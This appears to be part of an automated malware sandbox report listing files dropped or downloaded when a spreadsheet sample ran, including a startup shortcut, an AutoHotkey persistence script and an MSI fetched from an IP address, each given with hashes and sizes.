SSDeep 3:qRFiJ2totWIlXllll:qjyx
ImpHash -
File Reputation Information: Verdict Clean (Known to be clean.)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat Dropped File Stream
Clean
MIME Type application/octet-stream
File Size 16.00 KB
MD5 e7268dffaad766cc2f27781b5f0b8d6d
SHA1 6950cc6722088b20ec0b6223a376df3e2aa83b53
SHA256 5c804d35011a2c0b6dcd87bf56e895f25f759d6c2e6118de236cfa13246a3054
SSDeep 3:qRFiJ2totWIlXllll5llAj9WcrllibirwtXyrt:qjyxaj9WOi8QCrt
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat Dropped File Stream
Clean
MIME Type application/octet-stream
File Size 16.00 KB
MD5 bdeb6432dc7527072949be8c9433de29
SHA1 d23ec44b417f71a44eaad405a4fa342dff1ba6e6
SHA256 6f56cfc9a174ed7a23e31e3abf3e20cf776d1f9fb2b2bd5bf22c2d1a77d30754
SSDeep 3:qRFiJ2totWIlXllMl5llAj9WcrllibirwtXyrt:qjyxksj9WOi8QCrt
ImpHash -
C:\Config.Msi\16eda54.rbs Dropped File Stream
Clean
MIME Type application/octet-stream
File Size 2.64 KB
MD5 8f48c4c039606346a2d1d0a883fc0eec
SHA1 ba2bc01b5b2f4f7402872746a3d8a26448f86fde
SHA256 403b8a254729aecaa863c62414103a66ca029752af91df04c54b09bbfaf0cf45
SSDeep 24:/OgMb6zDkXCxlxI56NGI0cV08m0q0l0p0llpUUZFeV5snwZrwGw0dnwquVMCwGws:Gf6zXv/37WYnwZFu+8Pluzu1dD8SK1c
ImpHash -
C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSAWcfProxy.lnk Dropped File Shortcut
Clean
MIME Type application/x-ms-shortcut
File Size 1.71 KB
MD5 cdfdee046360c023302fd12692717893
SHA1 cb742e5a7e59bb332354d765f566767b837eaad4
SHA256 96c4d15be9b52b59c8c981ab531e83c0d6f79f7c71d9e05db5d2ce52645795df
SSDeep 24:8FOEK6nsypKUCnzkD4O+/dRnl1du1zO5D4O+/dRKh:8IwN0UCngD4Fn/du1SD4FKh
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\~dfbf2e38c5020521a2.tmp Dropped File Stream
Clean
Known to be clean.
MIME Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
SSDeep 3::
ImpHash -
File Reputation Information: Verdict Clean (Known to be clean.)
C:\Persistent\DSAWcfProxy.ahk Dropped File Text
Clean
MIME Type text/plain
File Size 350 Bytes
MD5 a9d79eda4c6e95057c6cb9f08ba72285
SHA1 464c825595ae5d9b48770c6304f370572563da5e
SHA256 db81436f20eae0fc0281746951580fa71cad691d9a15166fd0953e10e36e431f
SSDeep 6:bkWXWBbPIwAufyWB5MZ/VSVKGBJzV/b5Z5fHUUswx4acx4uDlt14kc4E:bpW1ImN/MLSoGTR/lbcdwx4z4upt14kQ
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\desktop.ini Dropped File Unknown
Clean
Known to be clean.
MIME Type application/x-wine-extension-ini
File Size 145 Bytes
MD5 ba96961f5e22882527919e19daea510f
SHA1 e10e8bebbd0573e3a1494ea3f21682f7490c427b
SHA256 dace5ad59099429d8aed4ee279f1263efb65d64456931398465a396cf0e79bd7
SSDeep 3:0NdQDjotjIAXNam+p28jqGiEI7fOLyovZeLhzUzYcB:0NwoyAXNxW28CEI7QyyZeNUzxB
ImpHash -
File Reputation Information: Verdict Clean (Known to be clean.)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\21nqf6bu\desktop.ini Dropped File Unknown
Clean
Known to be clean.
Also Known As c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\l9s4ejvz\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\m6c1x3yg\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\o37tgn32\desktop.ini (Dropped File)
MIME Type application/x-wine-extension-ini
File Size 67 Bytes
MD5 4a3deb274bb5f0212c2419d3d8d08612
SHA1 fa52f823b821155cf0ec527d52ce9b1390ec615e
SHA256 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
SSDeep 3:0NdQDjo8hzUzYcB:0NwosUzxB
ImpHash -
File Reputation Information: Verdict Clean (Known to be clean.)
C:\Config.Msi\MSIBA14.tmp Dropped File Empty
Clean
Also Known As C:\Config.Msi\MSIC55B.tmp (Accessed File, Dropped File)
C:\Persistent\DSAWcfProxy.exe~ (Accessed File, Dropped File)
MIME Type application/x-empty
File Size 0 Bytes (not extracted)
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash -
C:\Windows\Installer\MSI989D.tmp Downloaded File MSI
Clean
Also Known As 69.10.48.240_build3.msi (Downloaded File)
MIME Type application/x-msi
File Size 524.00 KB
MD5 435842fec424a8586e5855128884b319
SHA1 8ea14eaad1875aba13c4405c47191db6789090b1
SHA256 f7ba036b3b1a66fe80794cac08f49d6bac91688095f8eaf9857a1cbfebf5d864
SSDeep 12288:Wuh83qnFnYmuZMgZ1WxNOou0gGxPMH2tj:WQ83AYmngu1uqx+o
ImpHash -
image1.png Extracted File Image
Clean
Parent File C:\Users\kEecfMwgj\Desktop\Mobile_App_Project_Details.xls
MIME Type image/png
File Size 55.16 KB
MD5 bcd27f5e300071f71d1d7ee7fc2e113d
SHA1 7d48b99f2f9ba62de02fc87c31e8cc74692884b7
SHA256 b829c4bfcc3825aec7e611ed59716b72e94d20ea161810f1af743a704b86a1fd
SSDeep 1536:DI4Deap+fjSCqP533pQp6mPw0MlKOhqVqr//:leCCShP536pdPOlFqVY3
ImpHash -